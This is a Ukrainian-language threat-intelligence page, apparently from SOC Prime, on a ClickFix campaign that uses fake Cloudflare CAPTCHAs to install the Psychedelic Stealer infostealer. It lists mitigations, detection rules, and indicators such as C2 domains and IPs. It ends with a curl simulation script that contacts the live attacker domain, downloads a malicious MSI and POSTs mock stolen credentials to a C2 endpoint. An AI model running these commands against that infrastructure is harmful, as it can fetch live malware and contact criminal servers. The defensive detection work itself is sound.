SOC Prime Bias: High

25 Sep 2026 14:16 UTC

Психоделічний Стилер: Коли CAPTCHA Стає Інсталятором

Author Photo
SOC Prime Team linkedin icon Стежити
Психоделічний Стилер: Коли CAPTCHA Стає Інсталятором
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Arctic Wolf Labs відстежує кампанію, що використовує підроблені CAPTCHA від Cloudflare, вбудовані в зламані українські бізнес-сайти. Атака типу ClickFix переконує користувачів виконати MSI-пакет, який встановлює Psychedelic Stealer, інфостілер, розроблений для збору облікових даних браузера, токенів акаунтів і даних криптовалютних гаманців. Шкідливе ПЗ також підтримує постійні віддалені завдання через виділену інфраструктуру C2.

Розслідування

Розслідування виявило вбудовані іфрейми на легітимних українських вебсайтах, які перенаправляють відвідувачів у підроблену потік верифікації. Аналітики також ідентифікували панель управління приманками з брендом Rublevka TDS, яка контролює конфігурацію команд і записує телеметрію відвідувачів. Технічний аналіз MSI-пакету виявив зашифровану URL-адресу наступного етапу разом із основними процедурами шкідливого ПЗ для кражі облікових даних і даних.

Пом’якшення

Організації повинні спостерігати за підозрілими виконаннями Windows Installer (msiexec.exe) запущеними через веббраузери або інтерфейси командного рядка. Веб-фільтрація повинна блокувати відомі шкідливі домени, в той час як захисники повинні контролювати легітимні вебактиви на предмет несанкціонованих вбудованих іфреймів. Посилення контролю на кінцевих точках навколо створення запланованих завдань може додатково знизити ризик збереження.

Відповідь

При виявленні активності Psychedelic Stealer ізолюйте уражені кінцеві точки для припинення подальшого ексфільтрації даних або латерального руху. Аудитуйте профілі браузерів і локальне зберігання на предмет компрометованих облікових даних, токенів автентифікації й даних гаманців. Перевірте мережеву телеметрію на зв’язок з відомою C2 інфраструктурою та огляньте системи на предмет несанкціонованих запланованих завдань або підозрілих вбудованих компонентів.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="flowchart TDn step_drive_by["T1189 – Drive-by Compromise<br>Inject iframe into legitimate websites to load malicious script from fsputnik.com"]n step_input_capture["T1056 – Input Capture<br>Use JavaScript helper to copy a malicious Windows Installer command to the clipboard via fake Cloudflare CAPTCHA"]n step_ingress_transfer["T1105 – Ingress Tool Transfer<br>Download and install Psychedelic Stealer via msiexec.exe"]n rules_for_ingress_transfer("<b>Rule Name</b>: Suspicious File Download Direct IP (via proxy)<br/><b>Rule ID</b>: 0fa3da37-f604-4547-939f-1ec135990aad")n step_persistence["T1053.005 – Scheduled Task/Job: Scheduled Task<br>Establish persistence using a scheduled task named psychedelicloveUtils"]n step_credential_theft["Steal passwords and account tokens from Chromium-based browsers"]n step_c2_communication["T1071 – Application Layer Protocol<br>Communicate with C2 server at 193.178.159.128 to retrieve tasks and payloads"]n rules_for_c2_communication("<b>Rule Name</b>: Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)<br/><b>Rule ID

Сценарій атаки

Детекція

Підозрілий запис RunMRU зі семантикою LOLBin (через registry_event)

Команда SOC Prime
25 вер. 2026

Можлива спроба віддаленого встановлення MSI-файлу (через cmdline)

Команда SOC Prime
25 вер. 2026

Можливі C2-комунікації через HTTP до прямої IP-адреси з неспецифічним портом (через proxy)

Команда SOC Prime
25 вер. 2026

Підозрілий завантаження файлу через пряму IP-адресу (через proxy)

Команда SOC Prime
25 вер. 2026

IOC (HashSha256) для виявлення: Psychedelic Stealer: Коли CAPTCHA стає інсталятором

SOC Prime AI Правила
25 вер. 2026

IOC (SourceIP) для виявлення: Psychedelic Stealer: Коли CAPTCHA стає інсталятором

SOC Prime AI Правила
25 вер. 2026

IOC (DestinationIP) для виявлення: Psychedelic Stealer: Коли CAPTCHA стає інсталятором

SOC Prime AI Правила
25 вер. 2026

Виявлення доступу до інфраструктури Psychedelic Stealer [Вебсервер]

SOC Prime AI Правила
25 вер. 2026

Виконання симуляції

  • Наратив атаки та команди: Зловмисник прагне інфікувати ціль через механізм підробленої CAPTCHA. Симуляція імітує поведінку браузера жертви: спочатку, перехід на цільову сторінку зловмисника для уникнення початкового контролю, потім запит вручення шкідливого MSI-пакету, і нарешті, ініціація C2-зв’язку через HTTP POST до контрольного скрипту зловмисника. Ця послідовність призначена для імітації точних URI-шаблонів, виявлених в інфраструктурі Psychedelic Stealer.

  • Скрипт регресійного тестування: Наступний скрипт використовує curl щоб імітувати три окремі стадії логіки виявлення.

    #!/bin/bash
    # Скрипт симуляції доступу до інфраструктури Psychedelic Stealer
    
    TARGET_DOMAIN="uasputnik.com"
    
    echo "[+] Початок симуляції доступу до інфраструктури Psychedelic Stealer..."
    
    # Етап 1: Імітація відвідування цільової сторінки (Вибір 1)
    echo "[*] Імітація GET-запиту до цільової сторінки..."
    curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null
    
    # Етап 2: Імітація завантаження шкідливого MSI (Вибір 2)
    echo "[*] Імітація GET-запиту для завантаження пакету..."
    curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null
    
    # Етап 3: Імітація C2-комунікації через POST (Вибір 3)
    echo "[*] Імітація POST-запиту до кінцевої точки C2..."
    curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null
    
    echo "[+] Симуляція завершена. Перевірте SIEM на предмет тривог."
  • Команди очищення:

    # Оскільки ця симуляція заснована на мережі, жодних файлів не створюється у локальній системі
    # якщо спеціально не зазначено. Очищення локальної файлової системи не потрібно.
    echo "[+] Очищення завершено."